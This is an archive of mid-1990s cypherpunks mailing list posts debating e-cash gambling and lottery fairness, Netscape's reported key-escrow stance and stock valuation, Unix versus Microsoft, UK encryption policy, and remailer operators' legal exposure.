From: nobody@flame.alias.net (Anonymous)
Date: Fri, 1 Dec 1995 00:11:43 +0800
To: cypherpunks@toad.com
Subject: Re: e-cash gambling
Message-ID: <199511301536.QAA25670@utopia.hacktic.nl>
MIME-Version: 1.0
Content-Type: text/plain


Sameer, Ian, and then Tim wrote:

<many different snips throughout>

>>	Any enterprising cypherpunks in gambling-friendly
>>jurisdictions interested? I figure it would make ecash take off.. and
>>you'd get rich.
>>
>Does anyone know what jurisdictions allow lotteries/gambling?
>
>Here's an off-the-cuff idea:
>
>[Disclaimer: The following post is a gedanken experiment.  It should not
>be interpreted as condoning or encouraging anyone to break any
>laws, no matter how stupid the laws are.]
>

>Personally, I have long had great _hopes_ for using crypto for
>non-sanctioned gambling, but I'm pretty skeptical that many people will do
>it. For one thing, anyone knowledgeable enough to be comfortable with the
>crytography knows that gambling when a house cut exists is a lose. (And
>gambling with no house cut is, at best, a wash.)

And then Allen wrote:

>How about gambling on something other than random numbers? Idea Futures
>are one instance, as is sports gambling for those interested in that sort of
>thing.

[I am posting anonymously, but about a half-dozen of you will know who
I am. Please keep it confidential. I have posted (anonymously) a while
back on this subject, and I am aware of the lame, hard to use college
site which does something similar to what I will again suggest.]

I would like to see e-cash gambling on US Presidential elections/primaries
[as is currently done in London & Moscow]. There was an interesting W$J
article that pointed out how the odds in these gambling houses track the
results of elections more accurately (from thousands of miles away) than
Gallup & Roper ever have, (and without calling me at suppertime)<g>. The
W$J article appeared right after Clinton's victory over Bush. A web-page
in London giving the odds in easy-to-read form would be nice, and might
quickly lead to demand for actual gambling from "this side of the pond."
This could be accomplished through anonymous remailers & strong crypto.
It would accomplish the cypherpunk goals of setting important information
free through use of our technology, it would encourage gamblers to learn
about strong crypto, and it would use crypto for something besides child
porn or drugs, which will be good PR for us. There will, of course, be
lame arguments about this "demeaning the integrity of the process," but
I think Letterman and Leno could be trusted to handle them without our
help. ;)

<obalice(s) -- please, make it stop!>

<obNutscrape & clipper II "cold, dead neurons.">






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: tcmay@got.net (Timothy C. May)
Date: Fri, 1 Dec 1995 08:10:50 +0800
To: cypherpunks@toad.com
Subject: Netscape's Delicate Balancing Act
Message-ID: <ace375f6030210040b22@[205.199.118.202]>
MIME-Version: 1.0
Content-Type: text/plain



The market valuation of Netscape Communications is not specifically a
Cypherpunks topic, though many of us interested in it, and/or use Netscape.

But there are some issues about Netscape's future product plans which may
affect market valuation, and which also could hinge on PR issues like Jim
Clark's apparent support for mandatory key escrow.

To wit, Netscape is currently valued at $5 billion or so, despite having
essentially no revenues or profits (sure, it has a little of each, but not
much). This is more than the market capitalization of many sizable,
respected companies. Companies like General Dynamics, Apple Computer, CBS
(which was just sold to Westinghouse for $5B). Granted, Netscape investors
are betting on the come. (And contrary to what someone said, investors in
companies like Netscape are not mostly interested in profits. Rather, they
are interested in selling at a higher price, for whatever reason. This is
also known as the "greater fool" theory: that no matter how high the price
of a stock, there is some greater fool who will buy it a higher price. Of
course, the corrolary to the greater fool theory is that there is usually a
greatest fool.)

So, can Netscape keep a $5 billion valuation? (And more to the point, can
it double from where it is now, say, and sustain a $10 B valuation? I am
skeptical, personally, but I've been wrong before.)

What Netscape has to offer is based on a *public* standard, the Web and all
the various pieces that so many companies are supporting. Netscape's
_server_ market--which is said to be where the revenues are mostly coming
from--is likely to face heavy competition. As is the browser, of course.
(Spyglass Mosaic, Ravi's company, HotJava, CyberDog, MacWeb, and a bunch of
others).

Scenario #1: Netscape sticks to an open standard. Hard to see what keeps
the valuation at $5 B with so many free browsers, free servers, low-cost
servers, etc.

(From the browsing side, "brand loyalty" is probably minimal: I've used
several browsers, and currently use Netscape 1.1N for _some_ of my Web
needs. I'll switch "on a dime" to another browser if it offers features I
like. Others I have talked to feel the same way. I think "loyalty" to a
particular browser is close to nil. Much less than loyalty to a text
editor, for example.)

Scenario #2: Realizing this, Netscape seeks to "differentiate itself" by
proprietary technology.

"'Nuff said."

I can't see any means of "proprieterizing" the Web that Netscape could hang
on to. Any good ideas will be quickly copied or reverse-engineered by other
companies and groups.

Unlike a chip company, with various and complicated secrets tied up in
internal chip design data bases and in billion-dollar fabrication plants,
what could a browser or server really keep secret? Unlike a company like
Adobe, with various programs whose functionality can mostly be protected
from copying by use of copyright laws, a Web browser that operates on
public standard files in standard ways will be hard to protect.
(Ironically, Netscape's valuation is significantly higher than Adobe's, and
Adobe had something like $700 million in yearly sales and $100+ million in
profits.)

So, it is my thesis that "brand loyalty" to Netscape is ephemeral, that
users will flock to the Next Whizzy Thing faster than you can say "price
collapse."

The connection with crypto and key escrow is that any bad publicity, any
hint that Netscape is signing-on to be an agent for Big Brother, could
hasten this conversion.

While I would never, ever suggest to anyone that the sticker idea I devised
a few years ago--"Big Brother Inside"--be applied here, I can imagine
others will.

Netscape is in a very delicate balancing act. Jim Clark may turn out to be
the Karl Wallenda of the Web (with no Net to catch him).

--Tim May

Views here are not the views of my Internet Service Provider or Government.
---------:---------:---------:---------:---------:---------:---------:----
Timothy C. May              | Crypto Anarchy: encryption, digital money,
tcmay@got.net  408-728-0152 | anonymous networks, digital pseudonyms, zero
Corralitos, CA              | knowledge, reputations, information markets,
Higher Power: 2^756839      | black markets, collapse of governments.
"National borders are just speed bumps on the information superhighway."






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Simon Spero <ses@tipper.oit.unc.edu>
Date: Fri, 1 Dec 1995 09:37:53 +0800
To: "Timothy C. May" <tcmay@got.net>
Subject: Re: Netscape's Delicate Balancing Act
In-Reply-To: <ace375f6030210040b22@[205.199.118.202]>
Message-ID: <Pine.SOL.3.91.951130165549.1889D-100000@chivalry>
MIME-Version: 1.0
Content-Type: text/plain



If anyone interested, I'm planning to  make up some T-Shirts featuring 
"The South Bay Url Company". 

Simon // Yes, we also do Tulips

---
(defun modexpt (x y n)  "computes (x^y) mod n"
  (cond ((= y 0) 1) 	((= y 1) (mod x n))
	((evenp y) (mod (expt (modexpt x (/ y 2) n) 2) n))
	(t (mod (* x (modexpt x (1- y) n)) n))))





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "BlackHeart" <DR940788@caper1.uccb.ns.ca>
Date: Fri, 1 Dec 1995 06:03:45 +0800
To: cypherpunks@toad.com
Subject: query...
Message-ID: <199511301707073141.DR940788@caper1.uccb.ns.ca>
MIME-Version: 1.0
Content-Type: text/plain


Reply to: DR940788@caper1.uccb.ns.ca

   I am currently putting together an e-zine covering computer security
issues, non-mainstream music, and basically anything else people want to
write about.  This is an open query for submissions on any kind. Here are
good examples of what I will consider putting into the zine :

---------
Good chance of getting in:
a. interviews, quotes, etc. from "net personalities", writers, band
members, people with interesting computer-related jobs/hobbies/etc.
b. people involved in the field of computer security on either side of the
wall, hackers, phreaks, system admins, police, etc. and their tales
c. reviews of independant, or non-mainstream software, movies, music, etc.
d. any kind of new digital tech. that is interesting and unique, a
description and review
e. basically anything else that is related to the information age, digital,
cyber (even though i hate the word), 'net related, etc.

---------
NO chance of getting in:
a. political views/essays which are not a concern of the computer and/or
net community
b. fiction of ANY sort (sci-fi, cyberpunk, etc, etc.)
c. anything else not related to alternative or "tech" field (ex - reviews
of mainstream albums, movies, etc., also articles on things such as the
environment and gay rights will be turned away, simply because this is not
what the magazine is aiming for)

---------
If you have an album, tape, CD, software, device, etc. you want reviewed,
send it along to :

Terminal Obsession
P.O. Box 831
Sydney, Nova Scotia
CANADA
B1P 6T7


If you are interested in subscribing to the completed 'zine, wait until
you see an announcement, as the zine is not complete as of yet, and may
not be for a short while, so i have nothing to send you yet!




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: KJC@cityscape.co.uk (KJC)
Date: Fri, 1 Dec 1995 02:10:16 +0800
To: cypherpunks@toad.com
Subject: Re: [Rant!] Death by praise Re: Netscape gives in to key escrow
Message-ID: <199511301736.RAA29417@ns.cityscape.co.uk>
MIME-Version: 1.0
Content-Type: text/plain


>
>
>On Thu, 30 Nov 1995, Jay Holovacs wrote:
>
>> On Thu, 30 Nov 1995, Timothy C. May wrote:
>> > Can Netscape continue to prosper? This latest issue won't kill it,
>> 
>> I suspect this will unfortunately help. Stockholders are interested in 
>> profits, not principles. Co-oping with the feds will help Netscape get to 
>> the commercial market sooner, and most customers, sadly don't give a damn 
>> about privacy (or don't understand).
>
><Rant mode on>
>Clipper and family are vampires; shine some light on them and they're dead.
>Witness the public ridicule of the FBI 1% scheme. Compare that to the near
>mainstream silence about DT. The last round of Clipper was wonderful, for 
>a while in '94 we had Time sounding like Brock Meeks.
>
>If Jim Clark really does mean this nonsense then I hope he does a Dorothy 
>Denning and takes his show on the road (sorry Jeff). This is simply 
>easy fodder for journalists without a story, totally black and white 
>cheap shot at the gov. While people don't give a damn about their privacy, 
>they sure do get mad when they're shown how easy it is to take away. 
>They *hate* hearing the $ cost.
>
>Maybe some of the people on this list with higher profiles than myself should
>start defending Clipper and GAK as loudly and stupidly as possible. I've 
>grown dead tired of trying to get anyone around me interested in pgp,
>remailers and whatnot. Reverse psycho sounds a lot easier:
>
>"Noted counterterrorism expert Timothy May was quoted on Connie Chung Live 
>last night as saying "Clipper, GAK and CTHULHU666 are a hundred billion 
>dollar investment in your national security. Only through complete wiretapping 
>will we save our nation's children from violent cigarette smokers, tax 
>cheaters, unlicensed pit-bull owners, Tax 'n Spend Liberals, murderous Nation 
>of Islam Dope Pushers, audiophiles, christians, fat people, OJ and 
>jaywalkers on the infohighway." -USA Today" 
>
>(Apologies. You may now killfile me with a clear conscience.)
>
>If you can't beat 'em, subvert 'em.
>
>
>
As a _very_ low profile member of this list I thought a futile gesture
was needed at this point:
                        *I agree with you*
I've been trying to interest the  BBC in the U.K. in pgp, clipper et al 
for ages - I give up!.- BTW- after 'Britland' MPs posted hear a while back
I thought _maybe_ we'd hear more.Will the last one to leave Grate Britain
please switch out the lights!
kc

------------------------------------------------------     
Fingerprint:OF 3B IE 6A 8D 14 EC 9B 75 9B FB A2 E8 35 FE            
Finger: .plan + public key -> af91@ftp.cityscape.co.uk
http://www.gold.net/users/af91/kjc.htm
"...and now...five in a row by Whitney Houston"

------------------------------------------------------

   




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: loki@obscura.com (Lance Cottrell)
Date: Fri, 1 Dec 1995 10:18:05 +0800
To: cypherpunks@toad.com
Subject: Re: Getting a copy of the Jim Clark speech
Message-ID: <ace40d4e0a021004aa99@[137.110.24.250]>
MIME-Version: 1.0
Content-Type: text/plain


If he has not clarified his position by tomorrow evening, I will set up some
web pages explaining the situation and decrying Netscape's apparent
position on key escrow (GAK). I have the quotes that L. McCarthy posted,
and Jeff Weinstein's response. I have not been able to get the article off
the server yet (possible all the cypherpunks downloading it?). Any other
documents I should include?

        -Lance

At 1:24 PM 11/30/95, Jim Gillogly wrote:
>> Raph Levien <raph@c2.org> writes:
>> I called Netscape public relations. Here's what I found out:
>
>> 1. Netscape PR does not keep transcripts, etc., of Jim Clark's speeches.
>> 2. You can order a tape of the speech from Conference Copy for...
>
>Good initiative, but we needn't wait for 6 weeks to get a copy of it.
>All that needs to happen is for Jim Clark to explain what he meant, if
>it's different from what was reported.  No need for all the to-ing and
>fro-ing.
>
>Perhaps what he meant was simply reiterating the announcement of October
>when they said they'd support the TESSERA crypto API.  If it's worse than
>this, he should explain what's going on.  If not, October was the time to
>get excited rather than now.
>
>Waiting with bated breath...
>
>        Jim Gillogly
>        Highday, 10 Foreyule S.R. 1995, 21:24

----------------------------------------------------------
Lance Cottrell   loki@obscura.com
PGP 2.6 key available by finger or server.
Mixmaster, the next generation remailer, is now available!
http://obscura.com/~loki/Welcome.html or FTP to obscura.com

"Love is a snowmobile racing across the tundra.  Suddenly
it flips over, pinning you underneath.  At night the ice
weasels come."
                        --Nietzsche
----------------------------------------------------------






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: attila <attila@primenet.com>
Date: Fri, 1 Dec 1995 02:46:01 +0800
To: "P. Rajaram" <rajaram@morgan.com>
Subject: Re: The future will be easy to use
In-Reply-To: <9511300751.ZM7630@morgan.com>
Message-ID: <Pine.BSD.3.91.951130174443.7762B-100000@usr3.primenet.com>
MIME-Version: 1.0
Content-Type: text/plain


On Thu, 30 Nov 1995, P. Rajaram wrote:

> On Nov 29, 10:25pm, attila wrote:
> > Subject: Re: The future will be easy to use
> >    OK, I have not seen it (like I said, I will get it) or read ipsec.
> >
> >    However, despite the group ego, Sun _does_ listen and Sun does wish to
> > be the leader. If the rest of ipsec group has a specific list, maybe it
> > needs to presented higher up the pole.
> 
> There are different groups within Sun.
> The people pushing SKIP don't talk much with the group building IPv6.
>
   that's a given. NIBM (not invented by ME) syndrome.  That is what 
needs to stop. however, Sun has been playing the game recently of 
introducing an early product, then coming on with a more standard product.

   that does not change the fact the twogroups need to talk, and someone 
needs to coordiante resources.  Nothing wrong if SKIP shakes out a few 
details as they implement, but then it needs to go to the standards.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: attila <attila@primenet.com>
Date: Fri, 1 Dec 1995 03:21:10 +0800
Subject: SUN, UNIX, et al versus MS standards
In-Reply-To: <199511301517.JAA14087@spirit.sctc.com>
Message-ID: <Pine.BSD.3.91.951130175032.7762C-100000@usr3.primenet.com>
MIME-Version: 1.0
Content-Type: text/plain



    my only comment on Sun's non-portable software is that it
**used-to-be** a case of excessive Berzerkely attitude. Solaris is an
effort, and a very credible effort to meet industry and consumer
standards.  The code is compatible to Sys V R4, and on x86 implementations
will execute Sys V R4 binaries, as well as SCO binaries which opens that
whole set of markets (software availability). 

   at the Solaris 2.1 and 2.2 levels, Sparc Solaris and X86 Solaris were
not even compatible to each other. I just took 200K+ lines of code from a
Sys V package and ported it to both Sparc and X86 Solaris 2.4 --perfect.
The code also had defines for 4.2+ BSD --those also compiled.  Take your
pick. 

   Sun got the message on standards; their respone was to meet both; and,
they have done a good job of it. Secondly, there is no such thing as
bug-free code --that's like free-lunch and it's all relevant.  Which would
you rather have? patches available on the net, or be forced to upgrade to 
new bugs with MS plus a few more overkill features.

   Again, my point is: why bad mouth Sun?  This is what has fractured UNIX
in the market place and gives the MS assholes the ability to not only
stomp UNIX with reviews which always ask "...which flavour of UNIX is it
this month?"  but, even worse, it gives Gates an opportunity to set YET
ANOTHER **PROPRIETY** MS STANDARD --that does not run securely with the
mainline.  Do you wish to give Microsoft, whose intentions have never
waivered from getting a piece of every transaction in the world,
**complete** control over everything? on every desktop?  

In other words, do you want to see Microsoft, and possibly only
Microsoft/Intel, in the marketplace. Network managers complained about the
Ray Noorda cult, but wait until everybody is forced to join the Bill Gates
cult. 

   SUN is not the enemy; MS is.  Do you wish to live with MS who,
according to the head cultist, **never** issues a maintenance release
since the software does not have bugs.  Just updates, **expensive**
updates, which fix some bugs, add a few overkill features, and introduce
new bugs. 

   Is there any really good software for **applications** on UNIX at
even close to windows compatible prices --let alone the wealth of material
available.  Sure WABI gets the main productivity pieces, but PagerMaker
and Corel are frozen at Version 5 for WABI.

   Personally, I use OS/2 as the front end to my Suns;  OS/2 is likewise
frozen at W3.1 level software --but at least WinOS2 does not crash my
entire system or network.  I want some of the features in the W95 versions
of Corel and Pagemaker, such as HTML --they will never be made available
for either OS/2 of UNIX. 

   In other words, we need to stop bitching, and start supporting the
alternative systems --constructively.  It all comes back to software, and
even us techo-freaks, or whatever we are with the long hair blowing all
over, need to think about the people who want a simple answer and MS gives
the glitter --if we do not help sustain the alternatives, we will not even
have the luxury of decent hardware. Even GNU has a W95 and an NT **full
pack**. 





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: anon-remailer@utopia.hacktic.nl (Name Withheld by Request)
Date: Fri, 1 Dec 1995 02:21:52 +0800
To: cypherpunks@toad.com
Subject: Spam the Sign II
Message-ID: <199511301740.SAA29245@utopia.hacktic.nl>
MIME-Version: 1.0
Content-Type: text/plain


Looks like Spam the Sign I was a little premature.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Richard Martin" <rmartin@aw.sgi.com>
Date: Fri, 1 Dec 1995 08:31:39 +0800
To: Cypherpunks@toad.com
Subject: UK Labour Party policy on encryption
Message-ID: <9511301846.ZM3820@glacius.alias.com>
MIME-Version: 1.0
Content-Type: text/plain



-----BEGIN PGP SIGNED MESSAGE-----

[see http://www.poptel.org.uk/labour-party/policy/info-highway/content.html
for full text]

> It is important that privacy is rigorously protected over the
> new networks, for both personal and commercial reasons. We do
> not accept the "clipper chip" argument developed in the United
> States for the authorities to be able to swoop down on any
> encrypted message at will and unscramble it.
>
> The only power we would wish to give to the authorities, in
> order to pursue a defined legitimate anti-criminal purpose,
> would be to enable decryption to be demanded under judicial
> warrant (in the same way that a warrant is required in order
> to search someone's home).
>
> Attempts to control the use of encryption technology are wrong
> in principle, unworkable in practice, and damaging to the
> long-term economic value of the information networks. There is
> no fundamental difference between an encrypted file and a
> locked safe. A safe may be effectively impregnable in that the
> effort taken to open it would destroy the contents. An
> encryption algorithm, similarly, may be effectively
> unbreakable.

Notes.

I've taken this entirely out of context*; cpunks will be glad to
find that the same document manages to hit at least two of the
horsemen of the infocalypse. A few paragraphs earlier is the
standard "must protect women, children, and ethnic minorities"
(paraphrased) argument.

Labour seems likely to form the next government. And even if they
don't, their stated policy might be a good thing to take to the
Tories, saying something along the lines of, "Labour has a clue,
where's yours?" [Note that I was unable to find the Tory point
of view.]

I found this stuff from Anne Campbell MP's home page.

http://www.worldserver.pipex.com/home/anne.campbell

* for brevity's sake.

richard

Richard Martin                           I DON'T SPEAK FOR ALIAS|WAVEFRONT
Alias|Wavefront - Toronto Office [Co-op Software Developer, Games Team]
rmartin@aw.sgi.com/g4frodo@cdf.toronto.edu      http://www.io.org/~samwise
Trinity College UofT ChemPhysCompSci 9T7+PEY=9T8 Shad Valley Waterloo 1992

-----BEGIN PGP SIGNATURE-----
Version: 2.6.2

iQCVAwUBML5COB1gtCYLvIJ1AQFZ1wP+Ox2fbOKsEbtl06GZugpB8ecHl5cGYHSQ
7sBro0QFr2v4KZOV6X435LXmAqSV8ML+BmVsT/1bnfUzsxeIQErhC0q1kQeA+hAX
h21SYfW6hN3h2L9aOtLr/1FDZkKAcXGDNFkvq/weKQdxCbtTw0Nl1ZQym3oaYdhT
MrjKi85fU44=
=CeYH
-----END PGP SIGNATURE-----




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: attila <attila@primenet.com>
Date: Fri, 1 Dec 1995 04:32:02 +0800
To: cypherpunks <cypherpunks@toad.com>
Subject: WTO an even worse possibility as Inet regulator
Message-ID: <Pine.BSD.3.91.951130184221.7762G-100000@usr3.primenet.com>
MIME-Version: 1.0
Content-Type: text/plain



   based on an article from the (London) Financial Times [available from
John Young at jya@pipeline.com with subject line WAY_lad],

   a very credible white paper is circulating for the WTO to establish an 
internet CZAR to regualate the Internet and level the playing field world 
wide. 

   personally, the Feds and the FCC are bad enough --now they want to 
have a **global** bureaucracy play god  -???

   are we ready to go back to UUCP?







From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Jeff Hupp" <jhupp@novellnet.gensys.com>
Date: Fri, 1 Dec 1995 09:28:17 +0800
To: cypherpunks@toad.com
Subject: Re: Netscape gives in to key escrow
Message-ID: <26C5DB002BF@Novellnet.Gensys.com>
MIME-Version: 1.0
Content-Type: text/plain


On 30 Nov 95 at 13:30, Timothy C. May wrote:

: At 7:26 PM 11/30/95, Ravi Pandya wrote:
: >If you're looking for an alternative Web browser for Windows, we just made
: >ours available for free at www.netmanage.com. It's fast and reliable, and
: >supports HTML 3.0, inline video, software distribution, VRML (NT version),
: >Real Audio, TrueSpeech, etc.
: 
: This shows the price Netscape could pay for taking a pro-surveillance,
: anti-privacy stance.
: 

	The word is getting out.  Both brokers I have system support
	contracts with have called me asking for my take.
-- 
JHupp@gensys.com           |For PGP Public Key:
http://gensys.com          |finger jhupp@gensys.com
Waking a person unnecessarily should not be considered a capital crime.
For a first offence, that is





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Jeff Hupp" <jhupp@novellnet.gensys.com>
Date: Sat, 2 Dec 1995 14:58:11 +0800
To: cypherpunks@toad.com
Subject: Re: "Got a subpoena?"
Message-ID: <26C7BF95B31@Novellnet.Gensys.com>
MIME-Version: 1.0
Content-Type: text/plain


On 30 Nov 95 at 12:56, Jay Campbell wrote:

: >> "finessing" laws will become more important.  In short, they WILL have
: >> a subpoena--then what?
: >
: >	Then they'll find out that I don't have any information that
: >could help them, anyway.
: 
: What about a court order to (a) start comprehensive logging, and (b) not
: tell anyone under penalty of ______ .

	And at that point, you shut down the remailer and log each and every 
bounce.

	Now, they could get an order forcing you to run a remailer ~ but that 
would open up a whole new can of worms i.e. can you be forced, under 
court order, to commit a crime?

-- 
JHupp@gensys.com           |For PGP Public Key:
http://gensys.com          |finger jhupp@gensys.com
Autocracy is based on the assumption that one man is wiser
than a million men.  How's that again?  I missed something.





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: attila <attila@primenet.com>
Date: Fri, 1 Dec 1995 03:45:15 +0800
To: sameer <sameer@c2.org>
Subject: Re: "Got a subpoena?"
In-Reply-To: <199511301704.JAA23295@infinity.c2.org>
Message-ID: <Pine.BSD.3.91.951130185007.7762H-100000@usr3.primenet.com>
MIME-Version: 1.0
Content-Type: text/plain


On Thu, 30 Nov 1995, sameer wrote:

> > "finessing" laws will become more important.  In short, they WILL have
> > a subpoena--then what?
> 
> 	Then they'll find out that I don't have any information that
> could help them, anyway.
> 
> 	sameer
>
   yes, and that is where the absurdity of American law enters in, they
**charge** you with conspiracy!  --or destroying evidence of a crime (by
failing to keep logs)  --or even better, aiding and abetting the
commission of a crime as part of the "chain" of the crime. 

   and, you better believe they do whatever they want. and do not ignore
RICO, because if the "alledge" there were six or more conspirators, or
participants, they are starting tpo use RICO --and you can go away for
life without parole for even a simple "crime." 

   let me put it this way --been there, done that.  

   however, screw'm, if we dont put our asses on the line, not only will 
America in general not have freedom of speech, but we will not either. I 
do not necesarily condone the militias, but I certainly will not 
interfere with their rights 

it may not be too long before the words of Thomas Jefferson may ring true:
the purpose of the militia [a citizens' militia] is to, God forbid,
overthrow a state which has become tyrannical. 

 ****								   ****
 the government who fears weapons in the hands of its citizens, should!
 ****								   ****




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Bill Stewart <stewarts@ix.netcom.com>
Date: Fri, 1 Dec 1995 12:53:05 +0800
To: cypherpunks@toad.com
Subject: Re: ecash lottery (Was: ecash casino)
Message-ID: <199512010309.TAA10065@ix4.ix.netcom.com>
MIME-Version: 1.0
Content-Type: text/plain


Ian wrote:
>>The idea behind my proposal was that any participant can determine if he has
>>won.  The winning number (a hash of which was published beforehand, as in
>>a "bit commitment" scheme) is announced.  Anyone who picked a number
>>that, say, matched in the last digit, wins $2.  If you matched the
>>last two digits, you win $10, etc.  The house (without sacrificing
>>reputation) can't arrange who the big payoffs will go to, nor can it
>>(as I think Tim suggested) give out lots of small prizes and no big ones.

>There are two main kinds of lotteries - systems where many people have a 
>moderate chance of winning a fixed amount of money, and lotto-systems where
the winners split a jackpot that's based on current and/or previous players' 
losses\\\\\\ ticket purchases.  The former kind, such as numbers games,
works because the expected payoff is less than the ticket price -
you can make it honest through techniques like bit committment,
but as Tim points out, the kind of people who care about things like
bit committment know enough math to know these games are money-losers.
Perhaps you can attract some people with a flashy user interface,
but it's not like really being in Vegas with booze and babes and blinkenlights
and incessant noise and stale smoke and Siegfried and Roy's tiger act.

On the other hand, lotto systems are too easy to cheat with anonymous payees.
Sure, you can make sure that any genuine winners get paid, 
but you can also throw in the occasional ringer to share the prize,
and nobody can tell unless you do it often enough that people start checking
the probabilities.  Bit committment doesn't prevent this kind of cheating;
it just verifies that you knew the number in advance (oops :-).

You need some sort of externally verifiable source of random numbers;
an MD5 hash of the Wall Street Journal stock price web page from
a few hours after the last bet and digital timestamping or something
might be good enough.  (Of course, a single unified stock price page
becomes even less meaningful with large volumes of on-line anonymous private
stock trading.)

(The pre-digital version of this scam was to hire some poor old grandma from the
South Bronx as the shill, since nobody'd accuse Granny of conspiring with
the mob.
It wasn't really enough then, and now Granny may be using anonymous digicash
for her payoffs...)

Another way to cheat progressive lotto systems is to not report all
your ticket sales each week, since anonymity makes it excessively hard
to verify.  Committing to the list of all the numbers bet almost works,
but you could still skim a few percent by reporting smaller sales of
popularly chosen numbers, with the risk that you've occasionally got to
pay all six real winners 1/5 of the jackpot if you're unlucky.
You can't get around this by using large enough numbers that there's
a small probability of duplication, because that also reduces the 
probability of a win too far, and because some folks are going to pick
7777777...777 regardless of how many bits long their bet is.

Government lotteries are surprisingly free from this sort of problem.
Not because governments are excessively honest, of course :-)
Employee pay isn't generally dependent on profitability, 
there's enough public scrutiny that it's harder for employees to cheat
for their own gain (rather than their lotto organizations'),
and (perhaps most important) they're already taking such an appallingly
high cut of the winnings that there's no need for regular cheating -
it's one of the efficiencies possible in a highly unnatural monopoly.

But if all else fails, you might be able to talk Scott Adams into giving
you the World Wide Web franchise for Dogbert's Value-Priced Lottery Tickets..

#--
#				Thanks;  Bill
# Bill Stewart, Freelance Information Architect, stewarts@ix.netcom.com
# Phone +1-510-247-0663 Pager/Voicemail 1-408-787-1281






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: anonymous-remailer@shell.portal.com
Date: Fri, 1 Dec 1995 12:18:42 +0800
To: cypherpunks@toad.com
Subject: Re: Netscape gives in to key escrow
Message-ID: <199512010321.TAA09577@jobe.shell.portal.com>
MIME-Version: 1.0
Content-Type: text/plain


On Thu, 30 Nov 1995, Mike McNally wrote:
 
> Jeff Weinstein writes:
>  > have lots of stuff attributed to Jim, but very little of it is actual
>  > quotes.
> 
> Well, if there was in fact a speech made from which the pseudo-quotes
> in the article were taken, then surely the full text of that speech
> will be made available somewhere for clarification.

I read this article, and thought it to be quite a twist.  It's suicidal
from Netscape to say this. 

It's almost like a couple of stock promotions I was at yesterday at the
Calgary Petroleum Club.  Horrible nasty stuff.  Suicidal speeches. 
Especially the one guy from Neutrino Resources (an Oil and Gas Company)
who decided to explain what a Neutrino was before he started his "spiel"
and talking about how great his company was and how cashflow wasn't a good
measure of a company's worth.

Netscape could well learn from that.  (Unfortunately, I doubt that anyone
was there.) People in these audiences DO listen.  Press, investment
analysts, and the like who do pepper the audience didn't all just fall off
the turnip truck. 

Jim Clark, should have seen or heard this.  

If he did, then he might be a bit more careful with what he says ... but
then again, I'm not sure how involved he is in daily operations.  But
nothing that Netscape does any longer surprises this writer ... look at
how they handled the revelation back on Friday, October Thirteenth that
the emperor's product had no clothes. 

Did they respond to the claims??  No.  

All they did was spam this list with noise "unofficially, not speaking for
the company, but I work for Netscape" noise, and then continued
distributing their product.  Maybe these revelations will help to get the
Netscape product pulled from people's machines, but I'm not gonna hold my
breath on that one. 

The momentum which is behind their stock and product promotion now has a 
life of its own.  Stopping Netscape (and the stock from advancing) is 
like trying to stop a steam-roller.

But for now, I'm busy setting up an email account to allow people to send
replies to me, and to settle this "reputation" stuff once and for all.  

I should be back to posting very soon. 




Alice de 'nonymous ...

                                  ...just another one of those...


P.S.  This post is in the public domain.
                  C.  S.  U.  M.  O.  C.  L.  U.  N.  E.

> ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
> | Nobody's going to listen to you if you just | Mike McNally (m5@tivoli.com) |
> | stand there and flap your arms like a fish. | Tivoli Systems, Austin TX    |
> ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
> 





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: anonymous-remailer@shell.portal.com
Date: Fri, 1 Dec 1995 12:35:26 +0800
To: cypherpunks@toad.com
Subject: Re: Netscape gives in to key escrow
Message-ID: <199512010335.TAA10408@jobe.shell.portal.com>
MIME-Version: 1.0
Content-Type: text/plain


On Thu, 30 Nov 1995, Jay Holovacs wrote:

> On Thu, 30 Nov 1995, Timothy C. May wrote:
> 
> > Can Netscape continue to prosper? This latest issue won't kill it,
> 
> I suspect this will unfortunately help. Stockholders are interested in 
> profits, not principles. 

Uhhm, I think that that depends on what "class" of stockholder you're
speaking of.  The short term "trader" whose idea of a long-term investment
is the one that gives a decent return by lunchtime, or the one who wants
to buy a good company, make a solid investment, and put their stock away
for five years, knowing that their capital is being put to good use. 

They really are different players with different approaches.

Netscape stock as an example has lots of momentum ... it's in a feeding 
frenzy.  And I'm pretty sure that someone with "very" deep pockets -- 
possibly even someone who's got their own printing press -- is busily
buying everything in sight, and crossing trades on every up-tick.

(Disclaimer: Just my opinion, not speaking officically in any capacity.)

I'm not sure who might be behind any of this, though.  I haven't the
desktop power, nor the data or tool-set to chart and flow-analyze the
trading record, and see what the play is.)

I wouldn't really be surprised though if it was offshore interests who
want to "cash-in" on high-tech.  Standard "Von Clausewitz" reader-types. 
People who subscribe to "Von Clausewitz's" principles on "other means". 

I base this assessment purely on price-movement, and on the "known" 
fundamentals.  To this writer, it's pretty transparent.  

In the last six-weeks, Netscape has gone from the 60's to flirting with
150. That's one heck of a trend-line that some pseudo-technical
floor-trader types will jump on. 

Part of that is "market-forces", and part of that is definitely
"market-makers". 

The only way to counteract that is probably some Elliott Wave Theory
shakeout, or something similar.  It's the only way to stop 'em from
blowing up the balloon.  Or you need one killer scandal. 

Cheap advice, btw ... it's free ... and no-one even had to buy me a Gin &
Tonic, or some fancy canapes to hear it. 



Alice de 'nonymous ...

